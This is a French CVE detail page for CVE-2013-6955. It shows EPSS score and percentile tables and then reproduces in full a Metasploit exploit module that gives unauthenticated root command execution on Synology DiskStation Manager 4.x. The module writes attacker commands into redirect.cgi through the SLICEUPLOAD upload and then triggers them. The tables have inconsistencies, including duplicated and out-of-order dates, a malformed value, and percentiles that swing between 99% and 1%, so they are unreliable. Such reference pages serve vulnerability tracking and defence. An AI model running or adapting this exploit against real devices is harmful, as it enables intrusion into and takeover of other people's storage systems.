CVE-2013-6955 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	75.8%	–	–
2023-03-12	–	–	–	97.32%	–
2023-07-09	–	–	–	97.37%	–
2023-08-27	–	–	–	97.34%	–
2023-11-26	–	–	–	97.29%	–
2024-04-14	–	–	–	97.3%	–
2024-06-02	–	–	–	97.3%	–
2024-06-09	–	–	–	97.33%	–
2024-07-28	–	–	–	97.25%	–
2024-12-08	–	–	–	97.22%	–
2024-12-22	–	–	–	96.97%	–
2025-02-02	–	–	–	96.74%	–
2025-01-19	–	–	–	96.97%	–
2025-02-02	–	–	–	96.74%	–
2025-03-18	–	–	–	–	88.18%
2025-03-18	–	–	–	–	88.18,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	1%
2023-07-09	1%
2023-08-27	1%
2023-11-26	1%
2024-04-14	1%
2024-06-02	1%
2024-06-09	1%
2024-07-28	1%
2024-12-08	1%
2024-12-22	1%
2025-02-02	1%
2025-01-19	1%
2025-02-02	1%
2025-03-18	99%
2025-03-18	99%

## ## This module requires Metasploit: http//metasploit.com/download ## Current source: https://github.com/rapid7/metasploit-framework ### require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+) &junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x def initialize(info={}) super(update_info(info, 'Name' => "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution", 'Description' => %q{ This module exploits a vulnerability found in Synology DiskStation Manager (DSM) versions 4.x, which allows the execution of arbitrary commands under root privileges. The vulnerability is located in /webman/imageSelector.cgi, which allows to append arbitrary data to a given file using a so called SLICEUPLOAD functionality, which can be triggered by an unauthenticated user with a specially crafted HTTP request. This is exploited by this module to append the given commands to /redirect.cgi, which is a regular shell script file, and can be invoked with another HTTP request. Synology reported that the vulnerability has been fixed with versions 4.0-2259, 4.2-3243, and 4.3-3810 Update 1, respectively; the 4.1 branch remains vulnerable. }, 'Author' => [ 'Markus Wulftange' # Discovery, Metasploit module ], 'References' => [ [ 'CVE', '2013-6955' ], ], 'Privileged' => false, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Payload' => { 'DisableNops' => true, 'Space' => 0x31337, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl telnet', } }, 'Targets' => [ ['Automatic', {}] ], 'DefaultTarget' => 0, 'License' => MSF_LICENSE, 'DisclosureDate' => 'Oct 31 2013' )) register_options( [ Opt::RPORT(5000) ], self.class) end def check print_status("#{peer} - Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('webman', 'info.cgi'), 'vars_get' => { 'host' => ''} }) if res and res.code == 200 and res.body =~ DEVICE_INFO_PATTERN version = "#{$~[:major]}.#{$~[:minor]}" build = $~[:build] model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase } model = "DS#{model}" unless model =~ /^[A-Z]/ else print_status("#{peer} - Detection failed") return Exploit::CheckCode::Unknown end print_status("#{peer} - Model #{model} with version #{version}-#{build} detected") case version when '4.0' return Exploit::CheckCode::Vulnerable if build < '2259' when '4.1' return Exploit::CheckCode::Vulnerable when '4.2' return Exploit::CheckCode::Vulnerable if build < '3243' when '4.3' return Exploit::CheckCode::Vulnerable if build < '3810' return Exploit::CheckCode::Detected if build == '3810' end Exploit::CheckCode::Safe end def exploit cmds = [ # sed is used to restore the redirect.cgi "sed -i -e '/sed -i -e/,$d' /usr/syno/synoman/redirect.cgi", payload.encoded ].join("\n") mime_msg = Rex::MIME::Message.new mime_msg.add_part('login', nil, nil, 'form-data; name="source"') mime_msg.add_part('logo', nil, nil, 'form-data; name="type"') # unfortunately, Rex::MIME::Message canonicalizes line breaks to \r\n, # so we use a placeholder and replace it later cmd_placeholder = Rex::Text::rand_text_alphanumeric(10) mime_msg.add_part(cmd_placeholder, 'application/octet-stream', nil, 'form-data; name="foo"; filename="bar"') post_body = mime_msg.to_s post_body.strip! post_body.sub!(cmd_placeholder, cmds) # fix multipart encoding post_body.gsub!(/\r\n(--#{mime_msg.bound})/, ' \\1') # send request to append shell commands print_status("#{peer} - Injecting the payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri('webman', 'imageSelector.cgi'), 'ctype' => "multipart/form-data; boundary=#{mime_msg.bound}", 'headers' => { 'X-TYPE-NAME' => 'SLICEUPLOAD', 'X-TMP-FILE' => '/usr/syno/synoman/redirect.cgi' }, 'data' => post_body }) unless res and res.code == 200 and res.body.include?('error_noprivilege') fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed") end # send request to invoke the injected shell commands print_status("#{peer} - Executing the payload...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('redirect.cgi'), }) # Read command output if cmd/unix/generic payload was used if datastore['CMD'] unless res and res.code == 200 fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed") end print_good("#{peer} - Command successfully executed") print_line(res.body) end end end